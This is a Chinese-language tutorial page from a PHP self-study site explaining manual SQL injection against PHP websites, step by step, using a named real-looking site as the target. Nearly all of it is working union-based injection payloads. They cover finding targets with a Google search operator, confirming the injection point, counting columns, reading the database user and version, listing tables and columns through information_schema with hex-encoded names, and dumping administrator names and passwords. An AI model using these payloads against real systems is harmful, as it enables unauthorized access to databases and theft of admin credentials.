来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 我们以实例来讲述PHP网站的手工注射,个人感觉图文教程比视频更加直观,而却使用示例网站讲述更加具有实战性。利用工具:google 管中窥豹使用语句:site:heib0y.com inurl:php 可以找出注...
我们以实例来讲述PHP网站的手工注射,个人感觉图文教程比视频更加直观,而却使用示例网站讲述更加具有实战性。
利用工具:google 管中窥豹 http://www.2cto.com /products/shop.php?c=misc&id=8′ and 1=1 和and 1=2 一个正常一个错误 很明显的注射点 第二步:order by 1 一直增加数直到出错加到12时错误。说明是11 第三步:id=8 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11– 页面出现数字5和8, 在5的位置使用内置函数user()爆出当前的数据库使用账户 分别使用database(),version()代替5的位置可以爆出数据库名和MYSQL的版本() 第四步:有了数据库的库名和5.0以上版本信息,我们可以快速爆出所有表名,使用的语法是 php?id=72 and 1=2 union select 1,2,3,4,group_concat(table_name) 6,7,8,9,10,11 from information_schema.tables where table_schema=0x68706F6C 0x68706F6C 这里是数据库的十六进制的编码形式,使用小葵编码一下就行 从中找出敏感表名如admin user admins等等,再爆出管理的字段使用的语句是 php?id=72 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646D696E6973747261746F72 /*此处是表名的十六进制表示*/ 我们这里爆出的字段是password和name 最后一步:我们来爆出网站管理员的账号和密码这里是双暴字段方式 使用语句: and 1=2 UNION SELECT 1,2,3,4,5,6,7,group_concat(name,0x3a,password),9,10,11 from admins
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com